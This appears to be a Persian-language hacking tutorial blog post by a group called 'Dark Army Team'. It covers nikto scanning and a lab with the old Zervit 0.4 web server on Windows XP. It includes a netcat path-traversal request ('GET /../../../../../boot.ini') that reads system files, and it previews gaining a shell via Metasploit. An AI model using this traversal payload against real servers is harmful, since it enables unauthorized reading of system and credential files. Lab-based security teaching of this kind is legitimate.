loading...

Dark Army Team

We Work In The Dark To Serve The Light We Are Dark Army Team

بازدید : 7
شنبه 12 بهمن 1403 زمان : 10:51

درود به همه عزیزانی که دنبال یادگیری دانش ظریف امنیت شبکه اومدن به این وبلاگ

تو قسمت قبل درمورد ابزار nmap یه چیزایی یاد گرفتیم.

توی این قسمت:

* کار با ابزار nikto رو یاد میگیریم

* از عجایب پورت 3232 و رابطه ش با وب سرور zervit میگیم


کار با ابزار nikto

این ابزار کارش اینه که آسیب‌پذیری‌های وب اپلیکیشن‌ها رو با استفاده از پیدا کردن فایل‌های مخرب، نسخه‌های قدیمی‌نرم افزار‌های درحال اجرا و صد البته اشتباهاتی تو کانفیگ سرور پیدا کنه.

کار باهاشم ساده س. فقط یک سوئیچ h رو نیاز داریم که باهاش آی پی هدف رو به ابزار بدیم:

nikto -h 127.0.0.1

حالا توی خروجی میتونیم نسخه وب سرور و تکنولوژی و سیستم عامل هدف رو به همراه آسیب‌پذیری‌ها (اگه وجود داشته باشن) ببینیم.

همینقدر ساده!


پورت عجیب 3232

اینجا یکم کارمون واسه دیدن این پدیده (که گاهی ممکنه بهش بربخوریم و ازش استفاده کنیم) سخت میشه.

بیاید یک ماشین مجازی ویندوز xp آتیش کنیم و روش وب سرور zervit 0.4 رو نصب کنیم.

حالا بیاید با nmap آی پی ماشین مجازی رو ورژن اسکن کنیم [اگه تازه اومدی یه سر به پست قبل از این دوره بزن]

حدس بزنید چی شد؟؟ D:

از اونجایی که میدونم اکثرا گشادید و انجام نمیدید (که اگه میخواید حرفه‌‌‌ای شید باید انجام بدید)، وب سرور روی پورت 3232 کرش میکنه.

حالا شاید بگید این کجاش جالبه؟

خب داستان از این جایی جالب میشه که خروجی nmap رو بررسی میکنیم. بجای خروجی عادی nmap، یک سری هدر اچ تی ام ال میگیریم که نشون میده با وب سرور طرفیم!

این یعنی اگه رو مرورگر سایتو با پورت 3232 باز کنیم، با صفحه وب سرور مواجه میشیم. البته عموما چیز بدرد بخوری دستگیرمون نمیشه ولی نباید بیخیال شد!

الان که میدونیم با یک وب سرور طرفیم، ضرری نداره با netcat بهش وصل شیم!

nc 192.168.1.2 3232
								
GET / HTTP/1.1

اگه خروجی رو بررسی کنیم، میفهمیم وب سروری که باهاش سر و کار داریم zervit 0.4 ه که با یه سرچ خیلی ریز تو گوگل، میفهمیم این وب سرور مشکلات امنیتی شدیدی مثل بافر اورفلو ( buffer overflow) و آسیب‌پذیری LFI داره.

حالا میتونیم حرکات جالبی بزنیم.

بریم سراغ آسیب‌پذیری قدیمی‌و پرکاربرد LFI:

دوباره تو netcat به سرور وصل میشیم و بجای دایرکتوری اصلی (/)، یکم میریم عقب تر!

nc 192.168.1.2 3232
								
GET /../../../../../boot.ini HTTP/1.1

همینقدر ساده تونستیم محتوای boot.ini رو بگیریم!

با این روش میتونیم محتویات کل سیستم رو بخونیم و اطلاعات خوبی جمع آوری کنیم!

خب این قسمت هم همینجا تموم میکنم. ولی این تازه شروع این دوره‌س!

تو قسمت بعدی، جمع آوری اطلاعات با استفاده از ماژول‌های اسکن و کامند check تو متااسپلویت رو یاد میگیریم و باهاش از یه سیستم ویندوز xp دسترسی شل میگیریم!

We work in the dark, to serve light

We are Dark Army Team

آموزش استفاده از ماشین مجازی و نصب کالی لینوکس قسمت اول
نظرات این مطلب

تعداد صفحات : 0

آمار سایت
  • کل مطالب : 10
  • کل نظرات : 0
  • افراد آنلاین : 1
  • تعداد اعضا : 0
  • بازدید امروز : 126
  • بازدید کننده امروز : 126
  • باردید دیروز : 161
  • بازدید کننده دیروز : 161
  • گوگل امروز : 0
  • گوگل دیروز : 0
  • بازدید هفته : 313
  • بازدید ماه : 127
  • بازدید سال : 428
  • بازدید کلی : 38474
  • کدهای اختصاصی